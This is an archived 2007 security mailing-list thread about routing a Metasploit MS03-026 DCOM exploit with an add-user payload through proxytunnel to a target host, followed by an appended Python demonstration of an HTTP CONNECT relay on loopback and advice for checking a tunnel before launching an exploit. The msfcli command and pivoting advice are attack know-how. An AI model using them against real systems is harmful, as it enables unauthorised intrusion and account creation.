Re: Running metasploit thru proxytunnel

From: jond (x@jond.com)
Date: Thu Oct 11 2007 - 08:21:55 EDT


I don't know why I didn't think of doing this before. It's so common
sense. I've always hated pivoting because I've always had to manually
find the exploit I needed, compile it, get it back through the
targets, only to find out, it wasn't compiled right. 4 hours later....

So James, does proxytunnel/metasploit work with Alex's suggestion? If
so, I need to get this going in my lab.

On 10/10/07, Alexander Bondarenko <al.bondarenko@gmail.com> wrote:
> Hi,
>
> Why do you use RHOST=localhost? It should be the proxy IP, and RPORT should be
> the proxy port, not 235.
>
>
> Regards,
> Alex
>
>
> On Saturday 06 October 2007 15:18, James Kelly wrote:
> > Folks
> >
> > I've been banging my head into my keyboard for two days now, not
> > getting anywhere and I was hoping one of
> > you could smack me upside the head and tell me what I've screwed up.
> >
> > Problem:
> >
> > attacker IP: 1.2.3.4
> > proxy IP: 2.3.4.5
> > proxy port 6666
> > victim: 3.4.5.6
> > victim port: 7777
> >
> > Proxytunnel setup:
> >
> > proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:7777
> > **now the above config works fine with rdesktop when I use:
> >
> > proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
> > and I do
> > rdesktop localhost:666 <--I can ts to the victim box just fine.
> >
> > When I try to do metasploit over proxytunnel I do
> > config:
> > Metasploit framework2
> > exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure
> > Shell" ;-) goes to RPORT 135
> > payload: win32_adduser
> >
> > first the tunnel:
> > proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135
> > now metasploit
> > msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost
> > RPORT=235 PASS=password USER=blah
> >
> > When I hit the exploit I see "Sending Request..." then nothing.
> >
> > I can rdesktop via proxytunnel to the victim successfully but cannot
> > login with username blah password password.
> >
> > Assume the victim is vulnerable to dcom.
> >
> > Now, can anyone see anything obvious that I've screwed up?
> >
> >
> > ____________________________________________________________________________
> > 01001001 01100110 01111001 01101111 01110101 01100011 01100001 01101110
> > 01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011
> > 01111001 01101111 01110101 01101110 01100101 01100101 01100100 01110100
> > 01101111 01100111 01100101 01110100 01100001 01101100 01101001 01100110
> > 01100101 0010111
> > ____________________________________________________________________________

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
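The thread turns on what a proxytunnel listener actually is: a local port that, per accepted client, opens a connection to the HTTP proxy, issues a CONNECT to the destination, and then relays bytes both ways once the proxy answers 2xx. The following is an added example written for this page, not proxytunnel's code and not anything posted in the thread. It reimplements that relay in Python, together with a constructed CONNECT-only proxy and a constructed echo "victim", so the whole path runs on loopback. Every host and port is an assumption: 127.0.0.1 with ephemeral ports stands in for 2.3.4.5:6666 and 3.4.5.6:135, the toy proxy does no authentication, and the CONNECT is plain HTTP/1.0 with no TLS. The same code also shows the two failure modes a practitioner wants to recognise before launching an exploit through such a tunnel: a proxy answering 400 to bytes that are not an HTTP request (which is what reaches it if a client is pointed at the proxy port instead of the local listener), and a proxy answering 502 when it cannot reach the destination.

```python
# Added example, not code from the thread or from proxytunnel: a minimal
# local-listener -> HTTP CONNECT proxy -> target relay, with a constructed
# CONNECT proxy and echo victim so it runs on loopback; all hosts/ports are constructed.
import socket
import threading
from contextlib import suppress

def _pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates."""
    with suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def _read_head(sock):
    """Return the HTTP header block (bytes before CRLFCRLF), or None on early EOF.
    Anything after the blank line is discarded; both peers here wait for the reply first."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        if not (chunk := sock.recv(4096)):
            return None
        buf += chunk
    return buf.split(b"\r\n\r\n", 1)[0]

def _read_all(sock):
    buf = b""
    while chunk := sock.recv(4096):
        buf += chunk
    return buf

def _serve(handler):
    """Listen on an ephemeral loopback port, run handler per connection; return the port."""
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))
    ls.listen(5)
    def loop():
        while True:
            conn, _ = ls.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return ls.getsockname()[1]

def connect_through_proxy(proxy_addr, dest_host, dest_port):
    """Client half of CONNECT: a socket that reaches dest once the proxy says 2xx."""
    s = socket.create_connection(proxy_addr)
    s.sendall(f"CONNECT {dest_host}:{dest_port} HTTP/1.0\r\n\r\n".encode())
    head = _read_head(s)
    status = head.split(b"\r\n", 1)[0].split() if head else []
    if len(status) < 2 or not status[1].startswith(b"2"):
        s.close()
        raise ConnectionError(f"proxy refused CONNECT: {head!r}")
    return s

def start_tunnel_listener(proxy_addr, dest_host, dest_port):
    """The role of 'proxytunnel -a <port> -p proxy -d dest': a local port where each
    client gets its own CONNECT tunnel to dest. Returns the port to point the client at."""
    def handle(client):
        try:
            upstream = connect_through_proxy(proxy_addr, dest_host, dest_port)
        except OSError:
            return client.close()
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()
    return _serve(handle)

def start_fake_connect_proxy():
    """Constructed stand-in for the 2.3.4.5:6666 proxy: understands only CONNECT."""
    def handle(c):
        head = _read_head(c)
        req = head.split(b"\r\n", 1)[0].split() if head else []
        if len(req) != 3 or req[0] != b"CONNECT":
            c.sendall(b"HTTP/1.0 400 Bad Request\r\n\r\n")  # raw, non-HTTP bytes end here
            return c.close()
        host, _, port = req[1].decode().rpartition(":")
        try:
            up = socket.create_connection((host, int(port)))
        except OSError:
            c.sendall(b"HTTP/1.0 502 Bad Gateway\r\n\r\n")  # destination unreachable
            return c.close()
        c.sendall(b"HTTP/1.0 200 Connection established\r\n\r\n")
        threading.Thread(target=_pump, args=(c, up), daemon=True).start()
        threading.Thread(target=_pump, args=(up, c), daemon=True).start()
    return _serve(handle)

def start_echo_victim():
    """Constructed stand-in for 3.4.5.6:135: after EOF, echoes the input upper-cased."""
    return _serve(lambda c: (c.sendall(_read_all(c).upper()), c.close()))

def send_and_collect(port, payload):
    """Send payload to 127.0.0.1:port, half-close, and return the reply."""
    s = socket.create_connection(("127.0.0.1", port))
    s.sendall(payload)
    s.shutdown(socket.SHUT_WR)
    return _read_all(s)

if __name__ == "__main__":
    victim, proxy = start_echo_victim(), start_fake_connect_proxy()
    local = start_tunnel_listener(("127.0.0.1", proxy), "127.0.0.1", victim)
    print(send_and_collect(local, b"hello"), send_and_collect(proxy, b"hello"))
```

A cheap sanity check before firing any exploit through a tunnel like this: send a few arbitrary bytes to the port you intend to give the exploit and look at what comes back. Getting the bytes (or the target protocol's own banner or error) back means the tunnel reaches the destination; getting an `HTTP/1.0 4xx` line back means the bytes were parsed by the proxy itself, and silence after a partial send is what a dropped or never-established tunnel looks like from the client side.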



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT